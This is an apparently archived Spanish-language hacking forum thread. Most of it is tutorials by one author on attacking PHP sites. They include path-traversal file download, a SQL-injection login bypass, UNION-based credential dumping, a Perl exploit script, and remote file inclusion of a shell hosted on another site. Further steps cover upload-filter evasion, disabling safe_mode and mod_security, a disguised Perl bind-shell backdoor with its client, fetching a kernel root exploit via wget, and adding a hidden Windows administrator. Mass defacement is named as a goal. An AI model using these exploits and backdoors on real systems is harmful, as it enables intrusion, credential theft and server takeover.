";} header("Pragma: public"); header("Expires: 0"); header("Content-type: aplication/octet-stream"); header("Content-disposition: attachment; filename=$ar"); header("Content-Length:".filesize("$ar")); readfile("$filename"); } else { echo "
Debes seleccionar un archivo
"; } ?> ==============================================================================================

Ok , la parte vulnerable seria que descarga.php no deja descargar archivos del servidor pero
alguien con pensamientos maleficos se le ocurriria descargar archivos php o txt, convirtiendo a
esto en una tecnica peligrosa.

0x03:Como atacar

La forma de atacar es unica pues si saben algo de php se datan cuenta de que la forma de atacar
es asi.
Yo tengo el archivo descarga.php en mi servidor web local asi que veran 127.0.0.1

http://127.0.0.1/descarga.php?descargar=

El administrador usualmente pone links para esto que luego llaman a esa url y descargue el nombre del
archivo seleccionado pero con solo esa url mencionada podemos descargar lo que se no de la gana.

Ejemplos

Con esto descargamos el index.php

http://127.0.0.1/descarga.php?descargar=index.php

Con esto algun archivo de texto

htttp://127.0.0.1/descarga.php?descargar=/datos/contraseñas.txt

Todo depende de la imaginacion.

Eso si algunas paginas cuando se quiere descargar una pagina con php solo te van a tirar el codigo
html lo que es lamentable pero en realidad es solo buscar paginas vulnerables que nos dejen descargar
todo los phps con su codigo real. Ya que en los php , especialmente en los login.php o admin.php , la
mayoria de estos suelen tener datos de la base de datos y sus contraseñas.

0x04:Despedida

Espero que les haya gustado mi corto manual sino ,no lo lean y tirense de un piso 40 xD

Fuente = elgranguason.wordpress.com

Bye

Explotar vulnerabilidad By Pass (no replies)

Guason — Sun, 24 Jan 2010 13:02:20 -0500
Explotar vulnerabilidad By Pass

Autor:El Gran Guasón

Indice:

0x01:Introducción
0x02:Ejemplo de login vulnerable
0x03:Formas de atacar
0x04:Despedida

0x01:Introducción

Hola a cualquiera que lea esto.Antes de empezar hay que aclarar que sobre "by pass" no hay mucha
informacion por eso esto va a ser corto.Tambien cuando yo empece , ya hace mucho....... no habia
ningun manual para esto solo la inyeccion.Ademas cada vez que preguntaba nadie me contestaba o
decian cualquier cosa para llenar el tema.
Asi que aca vamos..............

0x02:Ejemplo de login vulnerable

Antes de empezar necesitas tener instalado algun software para tener un servidor web en
tu computadora. Eso si , que tambien tenga mysql y php.
Yo recomiendo Easy PHP pero como en este momento ya no encuentro un link. Les dejo
AppServer

http://www.appservnetwork.com/index.php?newlang=spanish

Los archivos para la web deben ir en C:\Appserv\www

Entonces a programar se ha dicho.

Antes que tienes que crear la base de datos , primero van a

Inicio - Todos los programas - Appserv - MySQL Command Line Client

Ejecutamos el MySQL Command Line Client y escribimos la contraseña.

Ejecuta los siguientes comandos.

Language: SQL
CREATE TABLE `users` (`id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT,`name` varchar(50) NOT NULL,`password` varchar(50) NOT NULL,PRIMARY KEY (`id`)) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ; INSERT INTO `users` VALUES (1, 'admin','123');

Esto va ser el formulario en html con las cajas de texto para usuario y password
Cuando presiones el boton se llevara los datos de user y pass al archivo abrir.php

Language: HTML
******************************************enter.htm***************************************************************** <title>LOGIN PASS</title> <h1>INSERTA USER Y PASSWORD</h1> <form action="abrir.php" method="post"> Usuario:<input type="text" name="usuario" size="20" maxlength="20" /> <br /> Password:<input type="password" name="password" size="10" maxlength="10" /> <br /> <input type="submit" value="Ingresar" /> </form> ****************************************************************************************************************************

OK, ya ejecutado correctamente los comandos en la consola y creado el archivo html.
Vamos a crear abrir.php , eso si cambien los datos localhost, root,test por los datos de
su base de datos.
Language: PHP
**********************************************abrir.php******************************************************************** mysql_connect('localhost','root')or die ('Ha fallado la conexión: '.mysql_error()); mysql_select_db('test')or die ('Error al seleccionar la Base de Datos: '.mysql_error()); function quitar($mensaje) { $nopermitidos = array("'",'\\','<','>',"\""); $mensaje = str_replace($nopermitidos, "", $mensaje); return $mensaje; } if(trim($HTTP_POST_VARS["usuario"]) != "" && trim($HTTP_POST_VARS["password"]) != "") { $usuario = strtolower(htmlentities($HTTP_POST_VARS["usuario"], ENT_QUOTES)); $password = $HTTP_POST_VARS["password"]; $result = mysql_query("SELECT name,password FROM users WHERE name='$usuario' AND password='$password' "); if($row = mysql_fetch_array($result)){ if($row["password"] == $password){ $_SESSION["k_username"] = $row['usuario']; echo 'Has sido logueado correctamente '.$_SESSION['k_username'].'
'; /*Ingreso exitoso, ahora sera dirigido a la pagina principal. */ }else{ echo 'Password incorrecto'; } }else{ echo 'Usuario no existente en la base de datos'; } mysql_free_result($result); }else{ echo 'Debe especificar un usuario y password'; } mysql_close(); ?> *******************************************************************************************************************

Cuando tengan todo listo. Prueben hacer el login con los datos correctos y despues con los
falsos para verificar que todo anden bien y no seguir el paso 0x03 al pedo.

0x03:Formas de atacar

La parte vulnerable es la sentecia sql.

Language: SQL
SELECT name,password FROM users WHERE name='$usuario' AND password='$password'

Como veran la idea de hacer un "by pass" es la de acceder a un login sin saber el password
ni el user quizas.................

¿Esto como se hacer? Pues para que suceda un "by pass" es que la sentencia sql quede true o
verdadero o algo asi xD.

Como sabemos los datos son : user:admin
pass:123

Ahora vamos al login en enter.htm de tu servidor web seria algo asi

http://127.0.0.1/enter.htm

Si probamos con estos datos : user:El Gran Guasón
pass:' or 0=0 #

Veran que logre entrar como si nada ¿que bien, no?
Esto paso porque si los datos no eran correctos en esta caso el password y username no pasaria
,pero ahora vemos que si 0 es igual a 0. La sentencia quedaria true y estariamos logeados.

0x04:Despedida

Ok , este ah sido el final del tutorial , como veran este manual es corto pero bueno , tiene lo
esencial para que sepan como funcionen

Rootear Servidores Webs (5 replies)

Guason — Fri, 09 Apr 2010 18:47:44 -0400
Rootear Servidores Webs

Autor:El Gran Guasón

Indice:

0x01:Introducción
0x02:Lograr ser admin
0x03:Encontrar el panel de administracion
0x04:Subir Shell
0x05:Habilitar funciones (by passing)
0x06:Rootear al servidor
0x07:Despedida

0x01:Introducción

Hola a todos. Hoy les voy a explicar como lograr rootear un servidor web y si quieren hacer mass defacement. Voy a tratar de explicar de varias maneras ya que nunca se sabe como puede estar configurado el servidor atacado. Yo usare un servidor local mio para practicar usando Easy PHP.

0x02:Lograr ser admin

Ok , mi target es http://127.0.0.1/index.php?id= , para atacarlo tendre varias formas pero solo usare
las mas comunes que serian RFI y SQL.
Si yo quiero hackear http://127.0.0.1/index.php?id= usando RFI , tendre que comprobarlo de la siguiente manera :

http://127.0.0.1/index.php?id=http://chairface.iespana.es/komela.htm

Si el resultado de esa busqueda nos da "komemela" seria que la web es vulnerable a RFI , use esta
web porque es mas comodo ver un resultado directo que cualquier web que diga "komemela".

Ok , ya vimos como ser admin usando RFI , pero como lo hago haciendo SQL.
Bueno para buscar la contraseña tengo que tener *Numero de columnas
*Nombre de tablas y columnas vitales.

Ok ,ahora vamos a intentarlo de la manera manual.

http://127.0.0.1/index.php?id=-1+union+select+0x545441

Si intentamos esto nos da cualquier cosa ya que no es la columna correcta pero si le seguimos sumando hasta cuatro ..........

http://127.0.0.1/index.php?id=-1+union+select+0x545441+0x545441+0x545441+0x545441

Ok ,esta consulta nos devolvio "TTA" porque .......

0x545441 = TTA en hexadecimal

Ok , ya tenemos el numero de columnas ahora vamos a sacar de la sig manera las tablas.

http://127.0.0.1/index.php?id=-1+union+select+0x545441+0x545441+0x545441+0x545441+from+users

Si la tabla "users" existe nos devolvera TTA. Por lo tanto en mi base de datos falsa es una sentencia correcta.

Ahora ay que sacar las columnas de la tabla "users"

Primero realizamos esta consulta

http://127.0.0.1/index.php?id=-1+union+select+1,2,3,4

Escogemos un numero al azar del resultado de la sentencia. Yo eligo uno.

http://127.0.0.1/index.php?id=-1+union+select+concat(name,0x3a,0x545441)+0x545441+0x545441+0x545441+from+users

Si vemos como resultado :TTA

Es porque la columna tabla existe.

Y ahora con el password

http://127.0.0.1/index.php?id=-1+union+select+concat(password,0x3a,0x545441)+0x545441+0x545441+0x545441+from+users

Pues nos dio de nuevo :TTA

Por lo tanto tenemos lo siguientes datos.

Numero de columnas = 4
Tabla = users
Columnas en users = name , password

Y ahora la consulta final para sacar el usuario y contraseña del admin

http://127.0.0.1/index.php?id=-1+union+select+concat(name,0x3a,password),2,3,4+from+users

Y con esto tenemos hola:123

usuario : hola
password : 123

0x03:Encontrar el panel de administracion

Ahora para encontrar el panel de administracion seria con mi tool Sniper-Admin en Ruby

Language: Ruby
#nAme program = Sniper-Admin #Version = ------------- #Autor = El Gran Guason system ('cls') require 'net/http' paths = "/admin1.html","/login.php","/admin1.php","/admin2.php","/admin2.html","/yonetim.php","/yonetim.html", "/yonetici.php","/yonetici.html","/adm/","/admin/", "/admin/account.php","/admin/account.html","/admin/index.php","/admin/index.html","/admin/login.php", "/admin/login.html","/admin/home.php","/admin/controlpanel.html","/admin/controlpanel.php","/admin.php", "/admin.html","/admin/cp.php","/admin/cp.html","/cp.php","/cp.html","/administrator/","/administrator/index.html", "/administrator/index.php","/administrator/login.html","/administrator/login.php","/administrator/account.html", "/administrator/account.php","/administrator.php","/administrator.html","/login.php","/login.html", "/modelsearch/login.php","/moderator.php","/moderator.html","/moderator/login.php","/moderator/login.html", "/moderator/admin.php","/moderator/admin.html","/moderator/","/account.php","/account.html","/controlpanel/", "/controlpanel.php","/controlpanel.html","/admincontrol.php","/admincontrol.html","/adminpanel.php", "/adminpanel.html","/admin1.asp","/admin2.asp","/yonetim.asp","/yonetici.asp","/admin/account.asp", "/admin/index.asp","/admin/login.asp","/admin/home.asp","/admin/controlpanel.asp","/admin.asp","/admin/cp.asp", "cp.asp","/administrator/index.asp","/administrator/login.asp","/administrator/account.asp","/administrator.asp", "/login.asp","/modelsearch/login.asp","/moderator.asp","/moderator/login.asp","/moderator/admin.asp","/account.asp", "/controlpanel.asp","/admincontrol.asp","/adminpanel.asp","/fileadmin/","/fileadmin.php","/fileadmin.asp", "/fileadmin.html","/administration/","/administration.php","/administration.html","/sysadmin.php","/sysadmin.html", "/phpmyadmin/","/myadmin/","/sysadmin.asp","/sysadmin/","/ur-admin.asp","/ur-admin.php","/ur-admin.html","/ur-admin/", "/Server.php","/Server.html","/Server.asp","/Server/","/wp-admin/","/administr8.php","/administr8.html", "/administr8/","/administr8.asp","/webadmin/","/webadmin.php","/webadmin.asp","/webadmin.html","/administratie/", "/admins/","/admins.php","/admins.asp","/admins.html","/administrivia/","/Database_Administration/","/WebAdmin/", "/useradmin/","/sysadmins/","/admin1/","/system-administration/","/administrators/","/pgadmin/","/directadmin/", "/staradmin/","/ServerAdministrator/","/SysAdmin/","/administer/","/LiveUser_Admin/","/sys-admin/","/typo3/", "/panel/","/cpanel/","/cPanel/","/cpanel_file/","/platz_login/","/rcLogin/","/blogindex/", "/formslogin/","/autologin/","/support_login/","/meta_login/","/manuallogin/","/simpleLogin/", "/loginflat/","/utility_login/","/showlogin/","/memlogin/","/members/","/login-redirect/","/sub-login/", "/wp-login/","/login1/","/dir-login/","/login_db/","/xlogin/","/smblogin/","/customer_login/","/UserLogin/", "/login-us/","/acct_login/","/admin_area/","/bigadmin/","/project-admins/","/phppgadmin/","/pureadmin/", "/sql-admin/","/radmind/","/openvpnadmin/","/wizmysqladmin/","/vadmind/","/ezsqliteadmin/", "/hpwebjetadmin/","/newsadmin/","/adminpro/","/Lotus_Domino_Admin/","/bbadmin/","/vmailadmin/", "/Indy_admin/","/ccp14admin/","/irc-macadmin/","/banneradmin/","/sshadmin/","/phpldapadmin/","/macadmin/", "/administratoraccounts/","/admin4_account/","/admin4_colon/","/radmind-1/","/Super-Admin/","/AdminTools/", "/cmsadmin/","/SysAdmin2/","/globes_admin/","/cadmins/","/phpSQLiteAdmin/","/navSiteAdmin/","/server_admin_small/", "logo_sysadmin/","server/","database_administration/","power_user/","system_administration/","ss_vms_admin_sm/"; intro=[ "+=============================================+", "+ Sniper-Admin By Guason +", "+ Buscador de panel de admin +", "+ Written By Guason +", "+ Email:guason-cracker[at]hotmail.com +", "+ Blog = guason-cracker.blogspot.com +", "+=============================================+" ] def print_intro text w="|" text.each do |str| str.scan(/./) do |c| STDOUT.flush if w=="|" print "\b"+c +w w="/" elsif w=="/" print "\b"+c +w w="-" elsif w=="-" print "\b"+c +w w="\\" else print "\b"+c +w w="|" end sleep 0.04 end print "\b " puts "" end end print_intro intro puts "\nInserta el host a scanear (e.g. example.com):" host=gets.chomp puts "\nInserta el puerto (e.g. 80):" port=gets.chomp print "\n\nOK , PROBANDO CON #{host}\n\n\n" paths.each do |path| begin http = Net::HTTP.new(host,port) resp= http.get(path) w=resp.body rescue print "\nNO SE PUDO CONECTAR\n\n" exit(1); end if w=~/User/ || w=~ /Username/ || w=~ /Password/ || w=~ /username/ || w=~ /password/ || w=~ /user/ || w=~ /pass/ || w=~ /User/ || w=~ /Pass/ || w=~ /USERNAME/ || w=~ /PASSWORD/ || w=~ /Senha/ || w=~ /senha/ || w=~ /Personal/ || w=~ /Usuario/ || w=~ /Clave/ || w=~ /Usager/ || w=~ /usager/ || w=~ /Sing/ || w=~ /passe/ || w=~ /P\/W/ || w=~ /Admin Password/ print "[?]Se encontro panel #{path}\n\n" print "\n\nWritten By Guason || 2009\n\n\n" system ('pause') exit(1); end end

Pues a me me dio login.php.

Asi que nos logeamos en http://127.0.0.1/login.php con los datos.

Usuario:Hola
Password:123

Y listo seremos admin !.

0x04:Subir Shell

Si ya tenemos todo esto , no signifca que todo el deface esta terminado sino que falta subir la shell. Pero yo me conformo siendo admin pues no soy ambisioso xD.Ok ,para subir la shell mediante RFI
seria asi.

http://127.0.0.1/index.php?id=http://chairface.iespana.es/shell.txt

Con esto ya estaria listo. Puede ser la pagina chairface.iespana ya haya quebrado pero si pasa eso
se buscan una shell la ponen en formato txt la suben a una web suya en el mismo formato (txt).

Para subir la shell habiendo conseguido ser admin mediante tecnicas sql y la pagina atacada no sea
vulnerable a RFI , se tendria que subir la shell mediante un upload. A veces los upload filtran la extensiones pero si este upload se dedica a imagenes seria asi shell.jpg.php y listo nos dejaria pasar la shell.
Despues para conectarnos con la shell seria http://127.0.0.1/imagenes/shell.jpg.php
Y con esto ya la shell estaria subida.
Eso si /imagenes es el directorio donde mi upload sube las imagenes. Los upload las ponen en directorio diferentes pero solo es cuestion de buscar.

0x05:Habilitar funciones (by passing)

Ahora vamos a aprender como habilitar funciones cuando estas son bloqueadas por seguridad bloqueando funciones como "exec" en el codigo php pero solo esta bloqueada para el que creo ese archivo.
Los modo de bypassing son SAFE-MODE y MOD_SECURITY

******Safe-Mode********

El modo seguro es cuando por ejemplo en un hosting donde hay usuarios que tienen un /home
diferente por cada usuario , esto es para que lo usuarios no se metan en el directorio del otro.
Normalmente hay varias formas para bypassear un Safe-Mode pero solo voy a explicar una.
Tendrian que crear un archivo ini con el siguiente codigo.

********datos.ini******************
register_globals = On
engine = On
safe_mode = Off
safe_mode_exec_dir = On
safe_mode_include_dir =On

*************************************
Con esto ya creado nos podremos mover con facilidad en el servidor

*********MOD_SECURITY********************

Tambien esta Mod_Security , este molesta mucho cuando nos queremos mover en el servidor atacado.Para esto tendremos que modificar el archivo .htaccess y agregar estas lineas........

SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
&/IfModule>

Y con esto ya estaria bypasseado el mod_security................

0x06:Rootear el servidor

Estamos ya casi en el final.Lo que necesitamos ahora es subir una shell inversa para poder conectarnos con el servidor atacado. Muchos fracasados usan netcat para esto pensando que es
la unica herramienta para hacer una shell inversa pero eso no es cierto , pues se puede programar una tranquilamente.............

Aca el codigo de una shell mia en perl

Language: Perl
===================back-Ass================================================# #Name program = Back-Ass #Version = 0.1 #Autor = El Gran Guason #Fucion = Ejecuta shell de acuerdo a OP linux o Win32 use Socket; use IO::Socket; sub SO{ my $SO = $^O; if (index($SO,'linux') == '0'){ return "Linux"; }else{ return "Windows"; } } $op = SO; if ($op eq "Windows") { &win32; } if ($op eq "Linux") { &linux; } sub win32 { exit if fork; $0 = "updatedb" . " " x100; $SIG{CHLD} = 'IGNORE'; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in($port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, "<&X"; open STDOUT, ">&X"; open STDERR, ">&X"; close X; exec("cmd.exe"); } close X; } } sub linux { $port = 11888; exit if fork; $0 = "updatedb" . " " x100; $SIG{CHLD} = 'IGNORE'; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in($port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, "<&X"; open STDOUT, ">&X"; open STDERR, ">&X"; close X; exec {'/bin/sh'} '-bash' . "\0" x 4; } close X; } } #==========================================================================
=========#

Y el cliente Connect-Ass

Language: Perl
#=============================Connect-Ass==========================================# #Name program = Connect-Ass #Version = beta #Autor = El Gran Guasón use IO::Socket; use Socket; my $host = shift; if (!$host) { print "\n\t\t\tConnect-ASS by Guason\t\t\t\n\n"; print "\nModo de uso $0 \n"; print " Ip de la victima infectada\n"; print "\nWritten by Guason\n\n"; exit 1; } $hoster = ver($host); if ($hoster eq "false") { print "\nLa IP es incorrecta\n\n"; exit 1; } $port = "11888"; print "\n[?]Conectando con $host\n\n"; sleep 10; system ("telnet $host $port"); print "\n[-]$host no esta infectado con back-ass\n"; ########################FUNciones################################################ sub ver { my $ip = shift; my $valid_number = '(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])'; my $valid = ($ip =~ m/^$valid_number\.$valid_number\.$valid_number\.$valid_number$/) ? return "ok" : return "false"; } ####################################################################### #==========================================================================
========#

Ahora compilamos back-ass a exe ya que eh visto que varios manuales utilizan a perl para ejecutar el backdoor pero no todos los servidores utilizan perl , lo que hace de todo esto una tarea inutil.
Ok , cuando tengan compilado el programa lo suben con la shell o algun upload y lo ejecutan , si lo subieron con la shell lo ejecutan asi ./back-ass.
Despues para conectarnos hacemos en nuesta computadora.

perl connect-ass.pl 127.0.0.1

Cambian 127.0.0.1 por la ip del servidor atacado , esperamos un rato y estaremos en la shell ejecutando comandos tranquilamente.
Ahora si el servidor atacado es un linux hacemos lo siguiente.

Ejecutamos:

uname -a ;pwd;id

Hagamos de cuenta que recibimos esto:

Guason->uname -a;pwd;id

Linux elat 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
/
uid=99(nobody) gid=99(nobody) groups=99(nobody)

Como veremos la version de linux es 2.4.7-10

Ahora es hora de buscar un exploit que nos permita rootear la version 2.4.7-10.Entonces tenemos el exploit kmod para explotar la version 2.4.7-10.
Entonces la subimos ya sea con wget si es que el servidore atacado tiene el comando o lo suben por la shell.
Cuando este subido le damos permiso de ejecucion:

chmod 777 kmod

y despues lo ejecutan asi

./kmod

Y listo si todo salio bien seremos root y lo podremos comprobar de la siguiente manera con el comando "id" y si vemos root sera porque ya lo somos xD.

Ahora si el servidor atacado es un Windows.

Entonces ejecutamos en la shell net user /add Idiota 123 y si quieren lucirse pongas esto

net localgroup Administradores /add Idiota

Y listo seremos admin aunque no root............................

Tendriamos que ejecutar mstsc.exe y se nos abrira una ventana , despues rellenamos los campos que nos pide y listo.............

0x07:Despedida

Espero que les haya gustado o si no francamente no me interesa xD.

Fuente:guason-cracker.blogspot.com

Analisis de un bug y creacion de un exploit (3 replies)

Guason — Sat, 23 Jan 2010 20:41:57 -0500
Analisis de un bug y creacion de un exploit

Autor: El Gran Guasón

Indice:

0x01:Introduccion
0x02:Creando un index vulnerable
0x03:Reconocimiento del bug
0x04:Creacion de un exploit
0x05:Practica del ataque
0x06:Despedida

0x01:Introduccion

Hola a todos . El otro dia quede pensando en que queria descubrir una vulnerabilidad para despues crear un exploit si la encontraba . Y me quede pensando en que mucha gente no sabe como un hace un exploit y publica solo el bug .Pues yo ya habia hecho un manual sobre creacion de exploits en perl pero no lo hice teniendo en cuenta un bug para poder hacerlo , asi que esta va a ser como un mejora.

0x02:Creando un index vulnerable

Para poder practicar les recomiendo Easy PHP , pueden buscarlo en google , descargarlo e instalarlo obviamente xD.Pero creo que lo tengo en algun lado de mi blog.
Ok , a continuacion veran un index vulnerable.

=======================index.php==============================================
Nuevo manual
Ejemplos

"; echo "user_id: ".$result[0]."
"; echo "username: ".$result[1]."
"; // echo "password: ".$result[2]."
"; echo ""; die();?>

===============================================================================

Y los datos para la consola sql

CREATE TABLE `users` ( `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, `name` varchar(25) NOT NULL, `password` varchar(50) NOT NULL, `country` varchar(20) NOT NULL, PRIMARY KEY (`id`) INSERT INTO `users` VALUES (1, 'Guason', '123', 'Argentina'); INSERT INTO `users` VALUES (2, 'Pero', '11', 'Infierno'); INSERT INTO `users` VALUES (3, 'Trinity', '12354', 'Via Lactea'); INSERT INTO `users` VALUES (4, 'Galaxia', 'gaylord', 'Cabaret');

oK , ahora verifiquen que hayan hecho todo bien de lo contrario se les mostrara como 400 errores .

0x03:Reconocimiento del bug

Ok ,como ya he explicado esto como 120 veces solo voy a poner la inyeccion sql ya hecha , ya que se debe al mal filtrado de las variables y con este error podemos sacar tablas y columnas con password o emails .

h
ttp://127.0.0.1/index.php?id=-1+union+select+concat(name,0x3a,password),2,3,4+from+users

Con esto logramos sacar el user y password de la pagina

Guason:123

Que mal, no? Pero esta es la parte mas interesante ya que explorer de PPE siempre me decia que usara anclas y ahora me doy cuenta de me hubiera quedado mejor asi

ht
tp://127.0.0.1/index.php?id=-1+union+select+concat(0x4e554c4c5354415254,name,0x3a,password,0x4e554c4c454e44),2,3,4+from+users

Muchos se preguntaran que resultado de esto . Pues observen

N
ULLSTARTGuason:123NULLEND

Y analicen como lo hice ya que los valores hex en realidad significan..........

0
x4e554c4c5354415254 = NULLSTART 0x3a = : 0x4e554c4c454e44 = NULLEND

Esta vez si pude lucirme ajajajajaja. Bueno ahora pasemos al siguiente punto .............................

0x04:Creacion de un exploit

Ok , como ya tenemos el exploit , la inyeccion sql completa y las anclas...............
Pues ya es hora de crear el exploit y no Xploit que es para robar correo que mal!

Primero llamamos al modulo necesario.

use
LWP::Simple;

Despues la damos valor al argumento

my $target = $ARGV[0];

Despues verificamos que el target se haya puesto o no

unless ($target) { print "\nprimer exploit\n\n"; print "\nmodo de uso = $0 \n" ; exit 1; }

Si todo sale bien creamos el path con la inyeccion sql y llamamos a la pagina.

$sql
= "-1+union+select+concat(0x4e554c4c5354415254,0x3c62723e,0x5b557365725,0x3d3d3d3d,name,0x3c62723e,0x5b50617373776f72645d,0x3d3d3d3d,password,0x3c62723e,0x4e554c4c454e44),2,3,4+from+users"; $final = $target.$sql; $contenido = get($final);

Muy bien , ahora verificamos la inyeccion sql y si funciono nos dara los datos

print "\n\n[+] Target = $target\n\n"; if ($contenido =~/NULLSTART(.*):(.*)NULLEND/) { print "[+] Usuario = $1\n"; print "[+] Password = $2\n"; } else { print "[-] No se encontro nada\n\n"; exit 1; } print "\n[ñ] Explotacion finalizada\n"; exit 1;

Quedo muy bien! Ahora pasemos al siguiente punto.

0x05:Practica del ataque

El exploit quedo de la siguiente manera

use LWP::Simple; my $target = $ARGV[0]; unless ($target) { print "\nprimer exploit\n\n"; print "\nmodo de uso = $0 \n" ; exit 1; } $sql = "-1+union+select+concat(0x4e554c4c5354415254,name,0x3a,password,0x4e554c4c454e44),2,3,4+from+users"; $final = $target.$sql; $contenido = get($final); print "\n\n[+] Target = $target\n\n"; if ($contenido =~/NULLSTART(.*):(.*)NULLEND/) { print "[+] Usuario = $1\n"; print "[+] Password = $2\n"; } else { print "[-] No se encontro nada\n\n"; exit 1; } print "\n[ñ] Explotacion finalizada\n"; exit 1;

Ok ,para realizar el ataque seria

perl exploit.pl http://127.0.0.1/index.php?id=

Resultado

[[code]
+] Target = http://127.0.0.1/index.php?id=

[+] Usuario = admin
[+] Password = 123

[±] Explotacion finalizada
[/code]

Como veran el ataque resulto exitoso. Con esto ya que concluye el manual.

0x06:Despedida

Espero que les haya gustado si no les gusto no comenten de lo contrario esta todo bien

Fuente = elgranguason.wordpress.com

Protección en joomla (8 replies)

taa — Tue, 26 Jan 2010 04:21:58 -0500
Saludos a tod@s, el otro día en irc estuve charlando con algún forero sobre el tema de vulnerabilidades en mi web, ya que haciendo unas pruebas fuimos capaces de sacar el nombre del administrador y el HASH de joomla. Bien, a la hora en que tuve que desconectar, uno de los usuarios me dijo que podria proteger mi web modificando las cabeceras y htmlities o algo así, ya que no me dio tiempo a anotarlo. El caso es que he estado dando vueltas por el foro, y al ser un novato, hay cosas que no logro entender (por no decir que no entiendo nada. Alguien sabría explicarme y ayudarme para proteger la web modificando estos códigos?? Tengo conocimientos medios de html.
Gracias por adelantado.

[Video Tuto] Subir shell por medio del phpmyadmin (linux) (4 replies)

g3n1ux — Wed, 07 Apr 2010 10:16:54 -0400
bueno me incentivaron a crear un video tuto ya que no soy fan de estos pero bueno :P jajaja creo que me gustaron
otra que he estado uff....re-inactivo en el foro :P solo entraba a ver que habia.. pero ya no xD vamos a colaborar como lo hago en otros foros :)

aki dejo algo que o hice en el 2009 reciente el 29 o 30 de diciembre :)

Descarga del video [Link Permanente]

P.D. si me equivoco en algo haganme avisar porke no quiero cometer esos errores :)

[Video] Full Source Disclosure (2 replies)

yoyahack — Fri, 08 Jan 2010 23:25:21 -0500

http://www.youtube.com/watch?v=Lo7ghHitKkg

Descargar
Captura del video.

Distributed Reflection Denial of Service (1 reply)

seth — Tue, 05 Jan 2010 12:50:41 -0500
En realidad esto es sobre seguridad en general, no web pero no encontré un mejor lugar para postearlo (@OzX, hay que cambiar eso)

Este paper es corto y explica lo basico del ataque: http://palisade.plynt.com/issues/2006Apr/ddos-reflection/
Este otro es mas largo, explica los distintos tipos de syn flood antes de hablar de este en especial. Muestra la historia y como defenderse: http://cs-www.cs.yale.edu/homes/arvind/cs425/doc/drdos.pdf

Microsoft IIS ASP Multiple Extensions Security Bypass (3 replies)

seth — Fri, 25 Dec 2009 16:02:28 -0500
En esta navidad, nos regalaron a todos una vulne en iis (?)

http://secunia.com/advisories/37831/
http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf

Basicamente consite en que si subis un archivo llamado algo.asp;.jpeg se ejecuta como asp y esto se puede usar para bypassear uploaders